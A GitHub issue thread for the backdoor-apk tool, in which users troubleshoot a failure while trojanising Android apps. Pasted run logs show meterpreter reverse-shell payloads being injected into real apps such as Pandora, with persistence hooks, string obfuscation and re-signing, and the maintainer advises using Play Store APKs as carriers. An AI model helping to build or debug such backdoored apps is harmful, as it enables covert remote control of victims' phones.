### ISSUE TITLE
Recompile problem

### ISSUE THREAD

**Issue by PaulElM** [dana-at-cp/backdoor-apk#47] opened 2016-10-17 20:10 UTC
[*] Running backdoor-apk.sh v0.1.4 on Mon Oct 17 22:05:27 CEST 2016
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.1.153
[?] Please enter an LPORT value: 9999
[*] Generating RAT APK file...done.
[+] Using payload: android/meterpreter/reverse_tcp
[+] Handle the reverse connection at: 192.168.1.153:9999
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[!] Failed to recompile original project with backdoor

Im using kali linux with the last version of apktool
[run.log.txt](https://github.com/dana-at-cp/backdoor-apk/files/534590/run.log.txt)

**Comment by dana-at-cp** [comment] 2016-10-18 01:29
@PaulElM Kali Linux rolling? Is Apktool installed/setup correctly?

https://ibotpeaches.github.io/Apktool/install/

**Comment by PaulElM** [comment] 2016-10-18 01:34
Thanks for the reply!
yeah apktool is installed .. tried apt-get install apktool => latest version
and i install it as mentioned here https://ibotpeaches.github.io/Apktool/install/
and im root on the system
how i can fix it?

**Comment by dana-at-cp** [comment] 2016-10-25 13:39
@PaulElM Any update on this? Have you tried different APKs?

**Comment by PaulElM** [comment] 2016-10-25 14:16
tried other apk and i have the same problem
can u do me a favor and give me the apktool version that u are using?

**Comment by dana-at-cp** [comment] 2016-10-25 15:29
@PaulElM I'm using the latest Apktool version within Kali Linux rolling.

```
root@kali:~/Code/github/backdoor-apk# which apktool
/usr/bin/apktool
root@kali:~/Code/github/backdoor-apk# apktool -version
2.2.0-dirty
root@kali:~/Code/github/backdoor-apk#
```

**Comment by dana-at-cp** [comment] 2016-10-25 15:33
@PaulElM Just confirmed that the latest version of backdoor-apk is working as expected on my system.

```
root@kali:~/Code/github/backdoor-apk/backdoor-apk# ./backdoor-apk.sh Pandora_7.4.apk 
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA      PPPPPPP    KKK  KKK
         |||_||_|||         AAA  AAA     PPP  PPP   KKK KKK
         || _  _o|| (o)    AAAA  AAAA    PPP  PPPP  KKKKKK
         ||| || |||       AAAAAAAAAAAA   PPPPPPPP   KKK KKK
         |||_||_|||      AAAA      AAAA  PPPP       KKK  KKK
         ||______||     AAAA        AAAA PPPP       KKK  KKKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|             Dana James Traversie

[*] Running backdoor-apk.sh v0.1.5 on Tue Oct 25 11:30:12 EDT 2016
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 2
[?] Please enter an LHOST value: 10.6.9.31
[?] Please enter an LPORT value: 443
[*] Generating RAT APK file...done.
[+] Using payload: android/meterpreter/reverse_https
[+] Handle the reverse connection at: 10.6.9.31:443
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
root@kali:~/Code/github/backdoor-apk/backdoor-apk# date
Tue Oct 25 11:31:57 EDT 2016
root@kali:~/Code/github/backdoor-apk/backdoor-apk#
```

**Comment by PaulElM** [comment] 2016-10-25 16:02
root@Paulzz:/usr/bin# which apktool
/usr/local/bin/apktool
root@Paulzz:/usr/bin# apktool -version
2.2.0
root@Paulzz:/usr/bin# apt-get install apktool 
Reading package lists... Done
Building dependency tree       
Reading state information... Done
apktool is already the newest version (2.2.0+dfsg-1).
0 upgraded, 0 newly installed, 0 to remove and 198 not upgraded.


And the same problem :(
root@Paulzz:/var/www/html/back# ./backdoor-apk.sh snap.apk 
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA      PPPPPPP    KKK  KKK
         |||_||_|||         AAA  AAA     PPP  PPP   KKK KKK
         || _  _o|| (o)    AAAA  AAAA    PPP  PPPP  KKKKKK
         ||| || |||       AAAAAAAAAAAA   PPPPPPPP   KKK KKK
         |||_||_|||      AAAA      AAAA  PPPP       KKK  KKK
         ||______||     AAAA        AAAA PPPP       KKK  KKKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|             Dana James Traversie

[*] Running backdoor-apk.sh v0.1.5 on Tue Oct 25 17:57:34 CEST 2016
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 2
[?] Please enter an LHOST value: 192.168.1.153
[?] Please enter an LPORT value: 4444
[*] Generating RAT APK file...done.
[+] Using payload: android/meterpreter/reverse_https
[+] Handle the reverse connection at: 192.168.1.153:4444
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[!] Failed to recompile original project with backdoor
root@Paulzz:/var/www/html/back#

**Comment by PaulElM** [comment] 2016-10-25 16:07
tried with pandora and it worked!!!

**Comment by dana-at-cp** [comment] 2016-10-25 16:12
@PaulElM Ok. Cool. Always try legitimate APKs (from the Google Play Store) to try and rule out issues with Apktool. If you are dealing with random APKs out on the Internet you will likely encounter problems with Apktool.

I'm going to close this issue since it seems the problem was with a specific, illegitimate APK file.

**Closed** 2016-10-25 16:13 UTC

**Comment by Arnab9976** [comment] 2019-08-21 05:51
usr/bin/apktool -version
2.3.4-dirty
this apktool are latest version but Failed to recompile original project with backdoor.
